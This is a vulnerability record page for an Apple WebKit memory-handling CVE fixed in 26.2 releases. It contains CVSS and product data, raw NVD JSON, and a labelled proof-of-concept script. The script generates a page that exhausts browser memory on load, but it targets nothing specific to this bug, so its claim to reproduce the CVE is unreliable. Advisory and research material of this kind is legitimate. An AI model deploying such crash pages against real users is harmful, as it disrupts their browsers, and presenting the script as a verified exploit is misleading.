Security Vulnerability Report
CVE-2025-46298 CVSS 6.5 MEDIUM

CVE-2025-46298

Published: 2026-01-09 22:16:00
Last Modified: 2026-04-02 19:21:05

Description

The issue was addressed with improved memory handling. This issue is fixed in Safari 26.2, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, tvOS 26.2, visionOS 26.2, watchOS 26.2. Processing maliciously crafted web content may lead to an unexpected process crash.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:* - VULNERABLE
Safari < 26.2
iOS < 26.2
iPadOS < 26.2
macOS Tahoe < 26.2
tvOS < 26.2
visionOS < 26.2
watchOS < 26.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-46298 PoC - Memory corruption leading to crash // This PoC demonstrates the vulnerability in WebKit memory handling // Note: This is for educational and security research purposes only const fs = require('fs'); function generateMaliciousHTML() { return ` <!DOCTYPE html> <html> <head> <title>CVE-2025-46298 Test Page</title> </head> <body> <script> // Trigger memory handling vulnerability function triggerVulnerability() { // Create objects that may trigger memory handling issues const elements = []; for (let i = 0; i < 1000; i++) { // Create and destroy DOM elements rapidly const div = document.createElement('div'); div.innerHTML = '<span>' + 'A'.repeat(10000) + '</span>'; elements.push(div); } // Force garbage collection patterns that may expose the bug elements.length = 0; // Create specific patterns that trigger the vulnerability const str = 'A'.repeat(0xFFFFFF); const arr = new Array(0xFFFFFF); for (let i = 0; i < arr.length; i++) { arr[i] = str.substring(0, 100); } } // Execute when page loads window.onload = function() { setTimeout(triggerVulnerability, 100); }; </script> </body> </html> `; } // Save PoC to file const html = generateMaliciousHTML(); fs.writeFileSync('CVE-2025-46298_poc.html', html); console.log('PoC generated: CVE-2025-46298_poc.html'); console.log('Open this file in Safari < 26.2 to trigger the vulnerability');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46298", "sourceIdentifier": "[email protected]", "published": "2026-01-09T22:15:59.693", "lastModified": "2026-04-02T19:21:04.973", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "The issue was addressed with improved memory handling. This issue is fixed in Safari 26.2, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, tvOS 26.2, visionOS 26.2, watchOS 26.2. Processing maliciously crafted web content may lead to an unexpected process crash."}, {"lang": "es", "value": "El problema se abordó con una gestión de memoria mejorada. Este problema está solucionado en tvOS 26.2, Safari 26.2, watchOS 26.2, visionOS 26.2, iOS 26.2 y iPadOS 26.2, macOS Tahoe 26.2. Procesar contenido web diseñado maliciosamente puede provocar un cierre inesperado del proceso."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "3ECBF838-536C-47F9-9876-C526B8ED32EC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "EA029506-5678-444B-93B5-27DAD643A1C0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", 
"matchCriteriaId": "6276FDCA-3407-4FDD-8437-B57C98A97084"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "FBA92B6D-E36C-432B-A041-94D81427CD75"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "E0BBFB45-21F3-4B72-8DB1-BE72AFE0D2AB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "EB10D901-4800-4DF9-AB35-48017C178161"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "15574823-ECE0-4394-99BC-6AFA34E599CC"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125884", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125886", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125889", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125890", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125891", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125892", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}